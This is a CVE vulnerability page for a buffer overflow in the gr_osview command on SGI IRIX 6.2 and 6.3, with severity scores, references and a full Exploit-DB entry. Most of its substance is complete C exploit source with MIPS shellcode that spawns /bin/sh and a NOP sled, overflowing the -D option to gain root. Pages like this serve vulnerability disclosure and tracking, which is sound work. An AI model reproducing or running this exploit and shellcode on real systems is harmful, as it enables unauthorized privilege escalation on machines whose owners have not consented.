Notifications for a CVE
Stay informed of any changes for a specific CVE.
CVE Descriptions
Buffer overflow in gr_osview in IRIX 6.2 and 6.3 allows local users to gain privileges via a long -D option.
CVE Informations
Metrics
| Metrics | Score | Severity | CVSS Vector | Source |
|---|---|---|---|---|
| V2 | 7.2 | AV:L/AC:L/Au:N/C:C/I:C/A:C | [email protected] |
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
Exploit information
Exploit Database EDB-ID : 20126
Publication date : 1996-12-31 23h00 +00:00
Author : Last Stage of Delirium
EDB Verified : Yes
/*
source: https://www.securityfocus.com/bid/1526/info
Under certain versions of IRIX, the 'gr_osview' command contains a buffer overflow that local attackers can exploit to gain root privileges.
The gr_osview command produces a graphical display of memory-management activity, including memory usage, page faults, TLB activity, and page swapping. This display provides a realtime window into the overall operation of the system. The buffer overflow itself is in the command-line parsing code and can be overflowed via a long user-supplied string.
*/
/*## copyright LAST STAGE OF DELIRIUM jan 1997 poland *://lsd-pl.net/ #*/
/*## /usr/sbin/gr_osview #*/
#define NOPNUM 3000
#define ADRNUM 3000
#define PCHNUM 1024
#define ALLIGN 1
char shellcode[]=
"\x04\x10\xff\xff" /* bltzal $zero,<shellcode> */
"\x24\x02\x03\xf3" /* li $v0,1011 */
"\x23\xff\x01\x14" /* addi $ra,$ra,276 */
"\x23\xe4\xff\x08" /* addi $a0,$ra,-248 */
"\x23\xe5\xff\x10" /* addi $a1,$ra,-240 */
"\xaf\xe4\xff\x10" /* sw $a0,-240($ra) */
"\xaf\xe0\xff\x14" /* sw $zero,-236($ra) */
"\xa3\xe0\xff\x0f" /* sb $zero,-241($ra) */
"\x03\xff\xff\xcc" /* syscall */
"/bin/sh"
;
char jump[]=
"\x03\xa0\x10\x25" /* move $v0,$sp */
"\x03\xe0\x00\x08" /* jr $ra */
;
char nop[]="\x24\x0f\x12\x34";
main(int argc,char **argv){
char buffer[10000],adr[4],pch[4],*b;
int i;
printf("copyright LAST STAGE OF DELIRIUM jan 1997 poland //lsd-pl.net/\n");
printf("/usr/sbin/gr_osview for irix 6.2 6.3 IP:17,19,20,21,22,32\n\n");
*((unsigned long*)adr)=(*(unsigned long(*)())jump)()+10256+1500+1024+3000;
*((unsigned long*)pch)=(*(unsigned long(*)())jump)()+10256+1500+1024+32636;
b=buffer;
for(i=0;i<ALLIGN;i++) *b++=0xff;
for(i=0;i<PCHNUM;i++) *b++=pch[i%4];
for(i=0;i<ADRNUM;i++) *b++=adr[i%4];
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
*b=0;
execl("/usr/sbin/gr_osview","lsd","-D",buffer,0);
}
Products Mentioned
Configuraton 0
Sgi>>Irix >> Version 6.2
- Sgi>>Irix >> Version 6.2 (Open CPE detail)
Sgi>>Irix >> Version 6.3
- Sgi>>Irix >> Version 6.3 (Open CPE detail)
References
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200008021924.e72JOVs12558%40ix.put.poznan.pl
Tags : mailing-list, x_refsource_BUGTRAQ
Tags : mailing-list, x_refsource_BUGTRAQ
ftp://patches.sgi.com/support/free/security/advisories/20040104-01-P.asc
Tags : vendor-advisory, x_refsource_SGI
Tags : vendor-advisory, x_refsource_SGI
2025©
tesweb SA
